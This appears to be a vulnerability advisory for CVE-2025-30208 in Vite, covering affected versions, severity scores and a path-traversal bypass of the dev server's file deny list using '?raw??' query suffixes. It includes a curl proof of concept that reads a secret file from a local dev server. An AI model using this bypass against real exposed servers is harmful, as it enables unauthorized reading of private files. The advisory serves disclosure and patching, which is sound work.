logo

CVE-2025-30208 vite

Package

Manager: npm
Name: vite
Vulnerable Version: >=6.2.0 <6.2.3 || >=6.1.0 <6.1.2 || >=6.0.0 <6.0.12 || >=5.0.0 <5.4.15 || >=0 <4.5.10

Severity

Level: Medium

CVSS v3.1: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N

CVSS v4.0: CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

EPSS: 0.81731 pctl0.99149

Details

Vite bypasses server.fs.deny when using ?raw?? ### Summary The contents of arbitrary files can be returned to the browser. ### Impact Only apps explicitly exposing the Vite dev server to the network (using `--host` or [`server.host` config option](https://vitejs.dev/config/server-options.html#server-host)) are affected. ### Details `@fs` denies access to files outside of Vite serving allow list. Adding `?raw??` or `?import&raw??` to the URL bypasses this limitation and returns the file content if it exists. This bypass exists because trailing separators such as `?` are removed in several places, but are not accounted for in query string regexes. ### PoC ```bash $ npm create vite@latest $ cd vite-project/ $ npm install $ npm run dev $ echo "top secret content" > /tmp/secret.txt # expected behaviour $ curl "http://localhost:5173/@fs/tmp/secret.txt" <body> <h1>403 Restricted</h1> <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list. # security bypassed $ curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw??" export default "top secret content\n" //# sourceMappingURL=data:application/json;base64,eyJ2... ```

Metadata

Created: 2025-03-25T14:00:02Z
Modified: 2025-03-25T14:00:02Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/03/GHSA-x574-m823-4x7w/GHSA-x574-m823-4x7w.json
CWE IDs: ["CWE-200", "CWE-284"]
Alternative ID: GHSA-x574-m823-4x7w
Finding: F308
Auto approve: 1